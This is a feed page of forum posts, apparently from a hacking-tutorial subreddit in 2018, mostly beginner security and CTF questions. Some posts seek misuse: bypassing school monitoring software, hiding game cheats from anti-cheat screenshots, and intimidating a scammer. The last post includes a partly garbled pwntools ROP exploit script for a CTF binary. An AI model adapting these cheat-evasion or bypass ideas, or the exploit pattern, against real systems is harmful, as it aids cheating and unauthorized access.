Your hacking tutorial

Subscribe to Your hacking tutorial feed
Welcome to the guide by Zempirians to help you along the path from a neophyte to an elite... From here you will learn the resources to expand your knowledge and from there you can access our stronger resources for hands on training and wargames.... Free Public Access to Zempirians Training Lab - http://training.zempirians.comYour Hacking Tutorial
Updated: 23 min 13 sec ago

Best resource for learning python

Fri, 11/16/2018 - 21:44

I've heard that python is the best language to learn first. I've seen some youtube serious but they are pretty dated. Are there many good updated websites/videos for free that I can learn from? I have a LOT of free time the next few months and I'd like to learn as much as I can.

submitted by /u/whoami123458
[link] [comments]
Categories: Information Security


Fri, 11/16/2018 - 19:07

Is there a way to hack lanschool and have teacher commands like lanschooled or no?

submitted by /u/im_kuda7
[link] [comments]
Categories: Information Security

Bandit isses...0

Fri, 11/16/2018 - 18:24

So I'm just getting started and I have spent hours trying to find out what's wrong but can't find an answer

I'm on level bandit0 (lol go easy on me pls) and after typing in the password I get this message

packet_write_wait: connection to XXX.X.X.XXX port 2220: broken pipe

Anyone know some good material to look at to solve this issue.

submitted by /u/MrPositive1
[link] [comments]
Categories: Information Security

CTF name voting

Fri, 11/16/2018 - 17:10

We are creating a free community based CTF for all. Please vote on a name.

submitted by /u/c00lme1
[link] [comments]
Categories: Information Security


Fri, 11/16/2018 - 14:50

If anyone can help me in my situation i'd be so grateful.

I am 13 years old and I bought an account for a game from someone I found on Discord.

I asked my dad before buying to make sure I was aloud and he said yes.

Obviously, with me being young and gullible, I got scammed. I have repeatedly tried to ask him for the account I paid for and every time I message him he just disappears and goes offline.

If anyone can help me do to try and "scare" him into actually giving me what I paid for i'd be grateful.

Before you say go to the police, I can't. I bought an account for Fortnite and its against the ToS to buy and sell them anyway, so it wouldn't do anything.


submitted by /u/Perqaz
[link] [comments]
Categories: Information Security

Kon-Boot Not working?

Fri, 11/16/2018 - 06:02

Hi, I recently burned the tool "Kon-Boot" in a CD. I tried to use it on my own computer to see how secure I am and it worked (I use Windows 10 Pro 64-bit). Than a friend mine told me to try it on his computer and when I tried it just keeps showing the Kon-Boot screen, than restarts the PC and go back to the screen, in a infinite loop. Sometimes it also change the text colour (maybe it's important that information). He uses Windows 10 Home 64-bit. Thanks for the attention.

submitted by /u/IceTapzOfficial
[link] [comments]
Categories: Information Security

Looking for a specific talk.

Fri, 11/16/2018 - 03:43

I can't remember when I saw it or what was the name of the talk. (I think it was either Blackhat or Defcon)

Maybe someone will remember, I will try to describe what I remember: the speaker talked about wireless tracking of devices via MAC addresses. He had created a software, which collects all seen Wlan and Bluetooth macs into a database timestamped. It could also automatically search He then demoed how he could cross-reference which devices in the room he has seen before, it also could somehow pull out the person's facebook profile.

submitted by /u/Temexi
[link] [comments]
Categories: Information Security

Methods of overcoming screenshot detection feature?

Thu, 11/15/2018 - 22:36

A lot of games will try and detect if you're cheating/hacking by taking a screenshot of the game window or the whole desktop.

Is bypassing that security feature as easy as hooking the windows api function for screenshot and whenever that function is used, the hack/cheat's gui is disabled for that millisecond and then enabled again, so that the hack gui doesn't appear in the screenshot?

Or can games create their own screenshot function that is harder to detect?

Can games do anything to stop me from doing this?

submitted by /u/DiligentArrival
[link] [comments]
Categories: Information Security

Why can't i get the output from pwntools after sending the payload?

Thu, 11/15/2018 - 18:58

I have succesfully solved a bunch of challanges using pwntools and radare2. Right now i'm constructing the payload with pwntools, write it to a file and debug / run the exploit through rarun2 profile. And this way it works, i get the flag printed out, but not when executing the python script! I only get the output from the vulnerable executable up until i send it the payload then nothing. This is really driving me crazy, i would like to use it not only locally but on ctf servers too.

Take one of them as an example (changed names to avoid spoilers):


!/usr/bin/env python2

from pwn import *

e = ELF('./vulnex') r = ROP('./vulnex')

gets = 0xf7e1f0d0 heapbuf = 0x0804b063, [heapbuf]), [heapbuf])

payload = str(r) + '\n/usr/bin/cat flag.txt\n'

print r.dump() input_ = fit({44: payload}, filler = 'A')

with open('./input', 'w') as inpt: inpt.write(input_)

io = e.process() io.send(input_) io.interactive() ```

When i run it, i get this:

``` ——> ./ [] 'censored' Arch: i386-32-little RELRO: Partial RELRO Stack: No canary found NX: NX enabled PIE: No PIE (0x8048000) [] Loaded cached gadgets for 'censored' 0x0000: 0xf7e1f0d0 0xf7e1f0d0(0x804b063) 0x0004: 0x80483e1 <adjust @0xc> pop ebx; ret 0x0008: 0x804b063 arg0 0x000c: 0x8048430 0x8048430(0x804b063) 0x0010: 'eaaa' <return address> 0x0014: 0x804b063 arg0 [+] Starting local process 'censored': pid 25499 [*] Switching to interactive mode censored by censored 32bits

You know changing these strings means I have to rewrite my solutions...

[] Got EOF while reading in interactive $ [] Process 'censored' stopped with exit code -11 (SIGSEGV) (pid 25499) [*] Got EOF while sending in interactive ```

But when running it through rarun2, it works without a problem:

``` ——> rarun2 rrp censored by censored 32bits

You know changing these strings means I have to rewrite my solutions...

FLAG{i_changed_this_line_but_here_was_the_flag} Segmentation fault (core dumped) ```

Obviously i have stdin=./input in ./rrp.

I tried to put a sleep(2) after io.send() but does nothing. Also tried scripts found online and they work! Can't get what I'm doing wrong here, it's so frustrating.

submitted by /u/andrelloh
[link] [comments]
Categories: Information Security